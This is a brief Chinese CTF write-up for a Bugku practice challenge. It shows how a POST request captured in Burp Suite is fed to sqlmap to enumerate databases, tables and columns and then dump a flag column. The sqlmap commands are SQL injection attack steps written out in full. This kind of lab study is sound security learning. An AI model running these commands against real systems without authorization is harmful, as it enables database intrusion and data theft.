sqlmap-post型 bugku 成绩单

手工注入的话就是常规了，不写了

记录第一次用sqlmap进行post注入

第一步，用bp拦截

 

 然后选择Copy to file，保存为txt格式

我这里保存为a.txt

 

 

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --dbs

爆数据库

然后爆表

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --tables

爆列

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --columns

爆字段

python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt -D skctf_flag -T fl4g -C "skctf_flag" --dump

 

 

 完成任务